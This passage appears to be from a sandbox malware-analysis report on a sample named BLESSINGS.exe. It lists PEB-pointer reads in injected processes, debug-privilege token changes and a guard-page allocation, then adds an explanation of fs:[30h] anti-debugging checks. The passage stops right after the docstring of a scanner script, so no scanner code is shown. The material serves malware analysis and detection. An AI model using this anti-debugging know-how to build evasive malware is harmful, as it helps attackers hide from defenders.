          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01753A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01773D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01778EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code functions that load the PEB pointer (mov r32, dword ptr fs:[00000030h]), grouped by function; the number is how many such loads the report lists for that function, followed by the destination register(s):
15_2_045E1C06: 1 (eax)
15_2_0455002D: 5 (eax)
15_2_0453B02A: 4 (eax)
15_2_0455BC2C: 1 (eax)
15_2_045F8CD6: 1 (eax)
15_2_045BB8D0: 6 (5 eax, 1 ecx)
15_2_045E14FB: 1 (eax)
15_2_045A6CF0: 3 (eax)
15_2_045258EC: 1 (eax)
15_2_0453849B: 1 (eax)
15_2_04529080: 1 (eax)
15_2_045A3884: 2 (eax)
15_2_0455F0BF: 3 (2 eax, 1 ecx)
15_2_045520A0: 6 (eax)
15_2_045690AF: 1 (eax)
15_2_04547D50: 1 (eax)
15_2_0454B944: 2 (eax)
15_2_04563D43: 1 (eax)
15_2_045A3540: 1 (eax)
15_2_0452B171: 2 (eax)
15_2_0454C577: 2 (eax)
15_2_0452C962: 1 (eax)
15_2_04529100: 3 (eax)
15_2_0452AD30: 1 (eax)
15_2_04533D34: 13 (eax)
15_2_045F8D34: 1 (eax)
15_2_045AA537: 1 (eax)
15_2_04554D3B: 3 (eax)
15_2_0455513A: 2 (eax)
15_2_04544120: 5 (4 eax, 1 ecx)
15_2_045A6DC9: 6 (5 eax, 1 ecx)
15_2_045D8DF1: 1 (eax)
15_2_0452B1E1: 3 (eax)
15_2_045B41E8: 1 (eax)
15_2_0453D5E0: 2 (eax)
15_2_04552990: 1 (eax)
15_2_0455FD9B: 2 (eax)
15_2_0455A185: 1 (eax)
15_2_04552581: 4 (eax)
15_2_0454C182: 1 (eax)
15_2_04522D8A: 5 (eax)
15_2_04551DB5: 3 (eax)
15_2_045A51BE: 4 (eax)
15_2_045F05AC: 2 (eax)
15_2_045535A1: 1 (eax)
15_2_045561A0: 2 (eax)
15_2_045A69A6: 1 (eax)
15_2_045B4257: 1 (eax)
15_2_04529240: 4 (eax)
15_2_04537E41: 6 (eax)
15_2_0454AE73: 5 (eax)
15_2_0456927A: 1 (eax)
15_2_045DB260: 2 (eax)
15_2_045F8A62: 1 (eax)
15_2_0453766D: 1 (eax)
15_2_04525210: 4 (3 eax, 1 ecx)
15_2_0452AA16: 2 (eax)
15_2_04543A1C: 1 (eax)
15_2_0455A61C: 2 (eax)
15_2_0452C600: 3 (eax)
15_2_04558E00: 1 (eax)
15_2_045E1608: 1 (eax)
15_2_04538A0A: 1 (eax)
15_2_045DFE3F: 1 (eax)
15_2_0452E620: 1 (eax)
15_2_04564A2C: 2 (eax)
15_2_045F8ED6: 1 (eax)
15_2_04568EC7: 1 (eax)
15_2_045536CC: 1 (eax)
15_2_045DFEC0: 1 (eax)
15_2_04552ACB: 1 (eax)
15_2_045376E2: 1 (eax)
15_2_04552AE4: 1 (eax)
15_2_045516E0: 1 (ecx)
15_2_0455D294: 2 (eax)
15_2_045BFE87: 1 (eax)
15_2_0453AAB0: 2 (eax)
15_2_0455FAB0: 1 (eax)
15_2_045252A5: 5 (eax)
15_2_045F0EA5: 3 (eax)
15_2_045A46A7: 1 (eax)
15_2_045F8B58: 1 (eax)
15_2_0452F358: 1 (eax)
15_2_0452DB40: 1 (eax)
15_2_0453EF40: 1 (eax)
15_2_04553B7A: 2 (eax)
15_2_0452DB60: 1 (ecx)
15_2_0453FF60: 1 (eax)
15_2_045F8F6A: 1 (eax)
15_2_0454F716: 1 (eax)
15_2_045E131B: 1 (eax)
15_2_045BFF10: 2 (eax)
15_2_045F070D: 2 (eax)
15_2_0455A70E: 2 (eax)
15_2_0455E730: 1 (eax)
15_2_04524F2E: 2 (eax)
15_2_045A53CA: 2 (eax)
Source: C:\Users\user\Desktop\BLESSINGS.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory allocated: page read and write | page guard
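The many `mov eax, dword ptr fs:[00000030h]` hits listed above are the evidence behind the report's "Contains functionality to read the PEB" and "Checks if the current process is being debugged" signatures. In a 32-bit process (raserver.exe runs as WoW64 here) fs:[0] is the TEB and TEB+0x30 holds the PEB pointer, so this one instruction gives the code PEB.BeingDebugged (+0x02) and PEB.NtGlobalFlag (+0x68) without ever calling IsDebuggerPresent. The scanner below is an added example, not part of the Joe Sandbox report or its tooling: it finds both common encodings of that load in a raw x86 code blob and names the PEB field the next instruction dereferences. SAMPLE_CODE is a constructed anti-debug stub for the demonstration, not bytes taken from BLESSINGS.exe or raserver.exe.

```python
"""Find PEB-pointer loads (mov r32, dword ptr fs:[0x30]) in a 32-bit x86 code blob.

Added example, not part of the Joe Sandbox report. fs:[0x30] is
TEB.ProcessEnvironmentBlock in a 32-bit (incl. WoW64) process; the byte
buffer SAMPLE_CODE is constructed for this demo, not extracted from the sample.
"""
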